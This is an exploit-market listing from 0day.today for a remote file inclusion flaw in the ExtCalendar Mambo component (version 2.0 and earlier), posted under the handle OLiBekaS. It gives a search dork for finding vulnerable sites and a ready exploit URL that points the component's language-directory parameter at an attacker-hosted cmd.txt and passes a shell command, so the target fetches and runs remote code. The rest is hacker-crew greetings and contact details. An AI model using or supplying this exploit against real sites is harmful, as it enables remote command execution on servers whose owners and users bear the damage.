[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

com_extcalendar Mambo Component <= 2.0 Include Vulnerability

Author
OLiBekaS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-584
Category
web applications
Date add
16-07-2006
Platform
unsorted
============================================================
com_extcalendar Mambo Component <= 2.0 Include Vulnerability
============================================================




--------------------------------------------------------------------------------
Title : ExtCalendar Mambo Module <= v2 Remote File Include Vulnerabilities
###############################################################################

Discovered By OLiBekaS
-----------------------------------------------------------------------------

dork        : "powered by ExtCalendar v2"
Exploit     :  
http://[target]/[path]/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://[attacker]/cmd.txt?&cmd=ls         
               
-----------------------------------------------------------------------------

greatz:
~~~~~
# Special greetz to my master effex and bEdAh`oTaK ( thank man )
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other

-------------------------------------------------------------------------------

Contact:
~~~~~~~

Nick: OLiBekaS
E-mail: olibekas[at]gmail[dot]Com
Homepage: http://bekas.6te.net

--------------------------------- [ eof ] ---------------------------------------



#  0day.today [2024-12-26]  #